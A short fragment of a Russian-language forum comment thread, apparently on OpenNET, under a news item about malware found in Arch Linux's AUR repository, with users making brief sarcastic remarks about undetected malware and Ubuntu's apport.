    плюсадын (выпиливает apport - еще один троянец, помимо "contest"а)
     
  • 1.135, Аноним (136), 20:50, 14/07/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    >В AUR-репозитории Arch Linux найдено вредоносное ПО

    А сколько ещё не выявлено.)
    Зато модно стильно и молодёжно.

     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2018 by Maxim Chirkov  
    ДобавитьПоддержатьВебмастеруГИД  
    Hosting by Ihor